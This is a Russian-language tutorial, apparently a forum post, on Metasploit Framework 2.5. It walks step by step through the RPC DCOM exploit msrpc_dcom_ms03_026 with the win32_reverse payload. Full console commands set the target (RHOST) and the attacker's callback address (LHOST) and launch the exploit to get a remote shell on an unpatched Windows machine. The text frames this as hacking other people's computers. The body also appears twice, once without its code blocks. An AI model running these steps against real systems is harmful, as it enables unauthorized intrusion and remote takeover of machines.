Metasploit Framework - обзор.
Итак, для тех, кто не знаком с этой прогой, знакомьтесь: Metasploit Framework, среда, предназначенная для разработки и тестирования эксплоитов. Проще говоря, Metasploit Framework (далее MSF) это огромная база эксплойтов, которая постоянно обновляется (эксплоит – это программный код, использующий уязвимость в программном обеспечении.). Скачать сабж можно здесь: http://www.metasploit.com/. Версии метасплойта есть как под винду, так и под юникс-подобные системы. Дистр MSF весит около ~10 мб, после распаковки занимает около 50 мб. Итак, после того, как ты скачал и установил метасплойт, перед тобой откроется окно консоли. Если ты ожидал увидеть вместо этого красивый gui-интерфейс, то тут тебя ждет облом %), придется учить команды консоли MSF. Сразу предупрежу, что открывается консоль достаточно долго (в зависимости от размера базы). Можно начинать работать, как только увидишь в окне консоли надпись:
Над этим словом можно увидеть статистику базы:
Вводим самую первую команду в неизвестной пока консоли %) - это help.
Я думаю,в этих командах больших проблем нет, тут достаточно знание английского, чтобы понять суть каждой команды. Поэтому двинемся дальше и посмотрим, какие эксплойты нам доступны на данный момент:
Перед тобой вылетит огромный список имеющихся сплойтов. Для примера заюзаем достаточно нашумевшую багу в винде - RPC DCOM. В списке, эксплоит под эту багу носит название: msrpc_dcom_ms03_026
Вот мы перешли в настройки этого эксплойта. Посмотрим цели данного сплоита:
Как видно, захвачена большая линейка %).
Далее посмотрим действия, которые может совершить сплоит:
Список также впечатляет. Для нашего примера возьмем действие win32_reverse (мы получим консоль управления удаленной тачкой.) Чтобы установить нужное действие делаем следующее:
, где win32_reverse - нужное нам действие. Далее посмотрим параметры эксплойта:
Здесь видно, что нужно произвести некоторые настройки, а именно: 1) В разделе Exploit поставить нужное значение для параметра RHOST (удаленный хост - хост, который мы будем атаковать). 2) в разделе Payload нужно настроить параметр LHOST. Параметры RPORT и LPOST уже стоят по дефолту , их менять не нужно. Назначаем адрес цели (RHOST):
Думаю, понятно, что вместо 127.0.0.1 вы указываете ip-адрес непропатченной тачки
. Далее опять смотрим параметры эксплойта командой show options и видим, что параметр RHOST приобрел наше значение.
Как видно, осталось указать параметр LHOST в разделе Payload. LHOST - это нас адрес, поэтому указываем наш ip-адрес, чтобы получить возможность управлять удаленным компом.
Значение установили, теперь можете проверить - все поля заполнены, эксплойт готов к работе. Осталось самое приятное - запустить сплойт командой exploit
Далее, в зависимости от того, пропатчена удаленная машина или нет, будет либо облом, либо великое счастье %))
Работа и конфигурирование остальных эксплойтов сильно не отличается. Разобрав одно - сложностей с остальными быть не должно. На этом я, пожалуй, и закончу %). Удачи.
Итак, для тех, кто не знаком с этой прогой, знакомьтесь: Metasploit Framework, среда, предназначенная для разработки и тестирования эксплоитов. Проще говоря, Metasploit Framework (далее MSF) это огромная база эксплойтов, которая постоянно обновляется (эксплоит – это программный код, использующий уязвимость в программном обеспечении.). Скачать сабж можно здесь: http://www.metasploit.com/. Версии метасплойта есть как под винду, так и под юникс-подобные системы. Дистр MSF весит около ~10 мб, после распаковки занимает около 50 мб. Итак, после того, как ты скачал и установил метасплойт, перед тобой откроется окно консоли. Если ты ожидал увидеть вместо этого красивый gui-интерфейс, то тут тебя ждет облом %), придется учить команды консоли MSF. Сразу предупрежу, что открывается консоль достаточно долго (в зависимости от размера базы). Можно начинать работать, как только увидишь в окне консоли надпись:
Код:
msf >
Код:
+ -- --=[ msfconsole v2.5 [143 exploits - 75 payloads] - что-то вроде этого;).
Вводим самую первую команду в неизвестной пока консоли %) - это help.
Код:
msf > show exploits
Нам выдаст:
? Show the main console help
cd Change working directory
exit Exit the console
help Show the main console help
info Display detailed exploit or payload information
quit Exit the console
reload Reload exploits and payloads
save Save configuration to disk
setg Set a global environment variable
show Show available exploits and payloads
unsetg Remove a global environment variable
use Select an exploit by name
version Show console version
Код:
msf > show exploits
Код:
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 >
Код:
msf msrpc_dcom_ms03_026 > show targets
Supported Exploit Targets
=========================
0 Windows NT SP3-6a/2K/XP/2K3 English ALL
Далее посмотрим действия, которые может совершить сплоит:
Код:
msf msrpc_dcom_ms03_026 > show payloads
Metasploit Framework Usable Payloads
====================================
win32_adduser Windows Execute net user /ADD
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_downloadexec Windows Executable Download and Execute
win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Pay
load
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payl
oad
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_ord Windows Staged Reverse Ordinal Shell
win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject
Код:
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
Код:
msf msrpc_dcom_ms03_026(win32_reverse) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 135 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Target: Windows NT SP3-6a/2K/XP/2K3 English ALL
Код:
msf msrpc_dcom_ms03_026(win32_reverse) > set RHOST 127.0.0.1
RHOST -> 127.0.0.1
Код:
msf msrpc_dcom_ms03_026(win32_reverse) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ------------- ------------------
required RHOST 127.0.0.1 The target address
required RPORT 135 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Target: Windows NT SP3-6a/2K/XP/2K3 English ALL
Код:
msf msrpc_dcom_ms03_026(win32_reverse) > set LHOST 195.0.0.1
LHOST -> 195.0.0.1
Код:
msf msrpc_dcom_ms03_026(win32_reverse) > exploit
Работа и конфигурирование остальных эксплойтов сильно не отличается. Разобрав одно - сложностей с остальными быть не должно. На этом я, пожалуй, и закончу %). Удачи.